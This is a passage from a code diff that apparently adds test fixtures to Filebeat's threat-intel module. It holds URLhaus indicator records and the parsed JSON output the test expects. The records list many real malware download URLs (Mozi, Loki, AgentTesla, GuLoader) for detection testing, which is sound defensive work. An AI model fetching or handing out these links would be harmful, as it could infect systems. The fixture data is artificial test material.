listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} +{"id":"960943","urlhaus_reference":"https://urlhaus.abuse.ch/url/960943/","url":"https://onedrive.live.com/download?cid=8FE9EB3F9398B325&resid=8FE9EB3F9398B325%21126&authkey=AOzL9FiDhEYRkm8","url_status":"online","host":"onedrive.live.com","date_added":"2021-01-14 15:57:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} +{"id":"960941","urlhaus_reference":"https://urlhaus.abuse.ch/url/960941/","url":"http://59.93.22.84:46462/Mozi.m","url_status":"offline","host":"59.93.22.84","date_added":"2021-01-14 15:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960940","urlhaus_reference":"https://urlhaus.abuse.ch/url/960940/","url":"http://59.95.173.7:39046/Mozi.m","url_status":"offline","host":"59.95.173.7","date_added":"2021-01-14 15:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960934","urlhaus_reference":"https://urlhaus.abuse.ch/url/960934/","url":"http://42.224.66.103:47418/Mozi.m","url_status":"online","host":"42.224.66.103","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960935","urlhaus_reference":"https://urlhaus.abuse.ch/url/960935/","url":"http://42.228.37.137:42287/Mozi.m","url_status":"online","host":"42.228.37.137","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960936","urlhaus_reference":"https://urlhaus.abuse.ch/url/960936/","url":"http://59.99.41.229:49596/Mozi.m","url_status":"offline","host":"59.99.41.229","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960937","urlhaus_reference":"https://urlhaus.abuse.ch/url/960937/","url":"http://42.229.232.193:39815/Mozi.m","url_status":"online","host":"42.229.232.193","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960938","urlhaus_reference":"https://urlhaus.abuse.ch/url/960938/","url":"http://61.53.104.80:36568/Mozi.m","url_status":"online","host":"61.53.104.80","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960939","urlhaus_reference":"https://urlhaus.abuse.ch/url/960939/","url":"http://222.141.45.45:32954/Mozi.m","url_status":"online","host":"222.141.45.45","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960933","urlhaus_reference":"https://urlhaus.abuse.ch/url/960933/","url":"http://211.195.3.122:57752/Mozi.m","url_status":"online","host":"211.195.3.122","date_added":"2021-01-14 15:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960932","urlhaus_reference":"https://urlhaus.abuse.ch/url/960932/","url":"http://186.33.123.115:52221/Mozi.m","url_status":"online","host":"186.33.123.115","date_added":"2021-01-14 15:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960931","urlhaus_reference":"https://urlhaus.abuse.ch/url/960931/","url":"http://125.44.251.66:58493/Mozi.m","url_status":"online","host":"125.44.251.66","date_added":"2021-01-14 15:50:40 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960930","urlhaus_reference":"https://urlhaus.abuse.ch/url/960930/","url":"http://117.222.174.88:57603/Mozi.m","url_status":"offline","host":"117.222.174.88","date_added":"2021-01-14 15:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960929","urlhaus_reference":"https://urlhaus.abuse.ch/url/960929/","url":"http://117.202.70.238:45439/Mozi.m","url_status":"offline","host":"117.202.70.238","date_added":"2021-01-14 15:50:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960928","urlhaus_reference":"https://urlhaus.abuse.ch/url/960928/","url":"http://117.222.163.220:58291/Mozi.m","url_status":"offline","host":"117.222.163.220","date_added":"2021-01-14 15:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960927","urlhaus_reference":"https://urlhaus.abuse.ch/url/960927/","url":"http://117.251.18.157:52785/Mozi.m","url_status":"online","host":"117.251.18.157","date_added":"2021-01-14 15:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960924","urlhaus_reference":"https://urlhaus.abuse.ch/url/960924/","url":"http://123.9.198.150:38582/Mozi.m","url_status":"online","host":"123.9.198.150","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960925","urlhaus_reference":"https://urlhaus.abuse.ch/url/960925/","url":"http://125.46.164.249:39503/Mozi.m","url_status":"online","host":"125.46.164.249","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960926","urlhaus_reference":"https://urlhaus.abuse.ch/url/960926/","url":"http://123.14.32.234:53018/Mozi.m","url_status":"online","host":"123.14.32.234","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960923","urlhaus_reference":"https://urlhaus.abuse.ch/url/960923/","url":"http://123.5.7.214:40698/Mozi.m","url_status":"online","host":"123.5.7.214","date_added":"2021-01-14 15:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960922","urlhaus_reference":"https://urlhaus.abuse.ch/url/960922/","url":"http://116.24.57.201:50060/Mozi.m","url_status":"online","host":"116.24.57.201","date_added":"2021-01-14 15:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960921","urlhaus_reference":"https://urlhaus.abuse.ch/url/960921/","url":"http://115.48.21.16:47874/Mozi.m","url_status":"online","host":"115.48.21.16","date_added":"2021-01-14 15:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960919","urlhaus_reference":"https://urlhaus.abuse.ch/url/960919/","url":"http://perezluzwsdycafeyzmn.dns.navy/perdoc/regasm.exe","url_status":"online","host":"perezluzwsdycafeyzmn.dns.navy","date_added":"2021-01-14 15:46:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"listed"},"reporter":"abuse_ch","larted":"true","tags":["exe","Loki","opendir"]} +{"id":"960920","urlhaus_reference":"https://urlhaus.abuse.ch/url/960920/","url":"http://59.58.148.90:33799/bin.sh","url_status":"online","host":"59.58.148.90","date_added":"2021-01-14 15:46:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960918","urlhaus_reference":"https://urlhaus.abuse.ch/url/960918/","url":"http://kalamikwsdyonlinedws.dns.navy/kaladoc/vbc.exe","url_status":"online","host":"kalamikwsdyonlinedws.dns.navy","date_added":"2021-01-14 15:45:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"listed"},"reporter":"abuse_ch","larted":"true","tags":["AgentTesla","exe"]} +{"id":"960917","urlhaus_reference":"https://urlhaus.abuse.ch/url/960917/","url":"http://54.224.10.186/js/js/lokkk.jpg","url_status":"online","host":"54.224.10.186","date_added":"2021-01-14 15:45:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["exe","Loki"]} +{"id":"960916","urlhaus_reference":"https://urlhaus.abuse.ch/url/960916/","url":"http://59.99.141.110:33201/Mozi.a","url_status":"offline","host":"59.99.141.110","date_added":"2021-01-14 15:38:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960914","urlhaus_reference":"https://urlhaus.abuse.ch/url/960914/","url":"http://59.99.136.138:53926/Mozi.m","url_status":"offline","host":"59.99.136.138","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960915","urlhaus_reference":"https://urlhaus.abuse.ch/url/960915/","url":"http://61.245.159.55:43917/Mozi.m","url_status":"online","host":"61.245.159.55","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960911","urlhaus_reference":"https://urlhaus.abuse.ch/url/960911/","url":"http://59.99.43.122:42053/Mozi.m","url_status":"offline","host":"59.99.43.122","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960912","urlhaus_reference":"https://urlhaus.abuse.ch/url/960912/","url":"http://49.68.21.201:57875/Mozi.m","url_status":"online","host":"49.68.21.201","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960913","urlhaus_reference":"https://urlhaus.abuse.ch/url/960913/","url":"http://59.96.26.38:35523/Mozi.m","url_status":"offline","host":"59.96.26.38","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960910","urlhaus_reference":"https://urlhaus.abuse.ch/url/960910/","url":"http://42.224.66.103:47418/i","url_status":"online","host":"42.224.66.103","date_added":"2021-01-14 15:38:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960908","urlhaus_reference":"https://urlhaus.abuse.ch/url/960908/","url":"http://27.41.206.240:53007/Mozi.m","url_status":"offline","host":"27.41.206.240","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960909","urlhaus_reference":"https://urlhaus.abuse.ch/url/960909/","url":"http://42.230.133.2:38089/Mozi.m","url_status":"offline","host":"42.230.133.2","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960904","urlhaus_reference":"https://urlhaus.abuse.ch/url/960904/","url":"http://42.230.178.221:35243/Mozi.m","url_status":"online","host":"42.230.178.221","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960905","urlhaus_reference":"https://urlhaus.abuse.ch/url/960905/","url":"http://42.224.249.12:50589/Mozi.m","url_status":"online","host":"42.224.249.12","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960906","urlhaus_reference":"https://urlhaus.abuse.ch/url/960906/","url":"http://221.200.70.79:42479/Mozi.m","url_status":"online","host":"221.200.70.79","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960907","urlhaus_reference":"https://urlhaus.abuse.ch/url/960907/","url":"http://42.224.168.94:43425/Mozi.m","url_status":"online","host":"42.224.168.94","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960903","urlhaus_reference":"https://urlhaus.abuse.ch/url/960903/","url":"http://163.125.207.35:35013/Mozi.a","url_status":"online","host":"163.125.207.35","date_added":"2021-01-14 15:36:28 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960902","urlhaus_reference":"https://urlhaus.abuse.ch/url/960902/","url":"http://125.44.244.43:35298/Mozi.m","url_status":"online","host":"125.44.244.43","date_added":"2021-01-14 15:35:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960900","urlhaus_reference":"https://urlhaus.abuse.ch/url/960900/","url":"http://116.73.8.210:54174/Mozi.m","url_status":"online","host":"116.73.8.210","date_added":"2021-01-14 15:35:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960901","urlhaus_reference":"https://urlhaus.abuse.ch/url/960901/","url":"http://121.61.104.66:42768/Mozi.a","url_status":"online","host":"121.61.104.66","date_added":"2021-01-14 15:35:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960898","urlhaus_reference":"https://urlhaus.abuse.ch/url/960898/","url":"http://117.247.206.115:59110/Mozi.a","url_status":"offline","host":"117.247.206.115","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960899","urlhaus_reference":"https://urlhaus.abuse.ch/url/960899/","url":"http://119.198.43.18:51476/Mozi.m","url_status":"online","host":"119.198.43.18","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960897","urlhaus_reference":"https://urlhaus.abuse.ch/url/960897/","url":"http://182.124.94.169:58839/Mozi.m","url_status":"online","host":"182.124.94.169","date_added":"2021-01-14 15:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960894","urlhaus_reference":"https://urlhaus.abuse.ch/url/960894/","url":"http://125.46.166.16:50249/Mozi.m","url_status":"online","host":"125.46.166.16","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960895","urlhaus_reference":"https://urlhaus.abuse.ch/url/960895/","url":"http://123.4.250.147:46173/Mozi.m","url_status":"online","host":"123.4.250.147","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960896","urlhaus_reference":"https://urlhaus.abuse.ch/url/960896/","url":"http://182.124.57.87:43785/Mozi.m","url_status":"online","host":"182.124.57.87","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960893","urlhaus_reference":"https://urlhaus.abuse.ch/url/960893/","url":"http://113.92.159.37:46924/Mozi.m","url_status":"online","host":"113.92.159.37","date_added":"2021-01-14 15:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960892","urlhaus_reference":"https://urlhaus.abuse.ch/url/960892/","url":"http://113.195.165.157:59734/Mozi.m","url_status":"online","host":"113.195.165.157","date_added":"2021-01-14 15:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960889","urlhaus_reference":"https://urlhaus.abuse.ch/url/960889/","url":"http://103.84.240.178:51620/Mozi.m","url_status":"offline","host":"103.84.240.178","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960890","urlhaus_reference":"https://urlhaus.abuse.ch/url/960890/","url":"http://115.54.239.78:42585/Mozi.a","url_status":"online","host":"115.54.239.78","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960891","urlhaus_reference":"https://urlhaus.abuse.ch/url/960891/","url":"http://103.46.242.87:57941/Mozi.m","url_status":"offline","host":"103.46.242.87","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960888","urlhaus_reference":"https://urlhaus.abuse.ch/url/960888/","url":"http://115.52.17.165:38308/i","url_status":"online","host":"115.52.17.165","date_added":"2021-01-14 15:32:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960887","urlhaus_reference":"https://urlhaus.abuse.ch/url/960887/","url":"http://42.227.222.174:55281/Mozi.m","url_status":"online","host":"42.227.222.174","date_added":"2021-01-14 15:22:44 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960886","urlhaus_reference":"https://urlhaus.abuse.ch/url/960886/","url":"http://42.233.232.90:57662/Mozi.a","url_status":"online","host":"42.233.232.90","date_added":"2021-01-14 15:22:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960885","urlhaus_reference":"https://urlhaus.abuse.ch/url/960885/","url":"http://59.97.173.255:40738/Mozi.m","url_status":"offline","host":"59.97.173.255","date_added":"2021-01-14 15:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960884","urlhaus_reference":"https://urlhaus.abuse.ch/url/960884/","url":"http://59.99.93.5:59018/Mozi.m","url_status":"offline","host":"59.99.93.5","date_added":"2021-01-14 15:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960880","urlhaus_reference":"https://urlhaus.abuse.ch/url/960880/","url":"http://39.66.175.56:60279/Mozi.a","url_status":"online","host":"39.66.175.56","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960881","urlhaus_reference":"https://urlhaus.abuse.ch/url/960881/","url":"http://27.216.188.167:52738/Mozi.m","url_status":"online","host":"27.216.188.167","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960882","urlhaus_reference":"https://urlhaus.abuse.ch/url/960882/","url":"http://60.212.123.142:37394/Mozi.m","url_status":"online","host":"60.212.123.142","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960883","urlhaus_reference":"https://urlhaus.abuse.ch/url/960883/","url":"http://58.249.22.13:56491/Mozi.m","url_status":"online","host":"58.249.22.13","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960879","urlhaus_reference":"https://urlhaus.abuse.ch/url/960879/","url":"http://120.193.91.214:46067/Mozi.a","url_status":"online","host":"120.193.91.214","date_added":"2021-01-14 15:20:19 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} diff --git a/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log-expected.json b/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log-expected.json new file mode 100644 index 000000000000..5f12181b2dbf --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log-expected.json @@ -0,0 +1,3397 @@ +[ + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961548/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 0, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "103.72.223.103", + "threatintel.indicator.first_seen": "2021-01-14T21:19:13.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "103.72.223.103", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://103.72.223.103:34613/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 34613, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961546/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 359, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "112.30.97.184", + "threatintel.indicator.first_seen": "2021-01-14T21:19:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "112.30.97.184", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://112.30.97.184:44941/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 44941, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961547/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 716, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "113.110.198.53", + "threatintel.indicator.first_seen": "2021-01-14T21:19:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "113.110.198.53", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://113.110.198.53:37173/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 37173, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961545/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 1075, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "101.20.183.170", + "threatintel.indicator.first_seen": "2021-01-14T21:19:04.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "101.20.183.170", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://101.20.183.170:47545/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 47545, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961544/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 1434, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "59.8.35.22", + "threatintel.indicator.first_seen": "2021-01-14T21:07:07.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "59.8.35.22", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://59.8.35.22:44782/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 44782, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961543/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 1784, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + 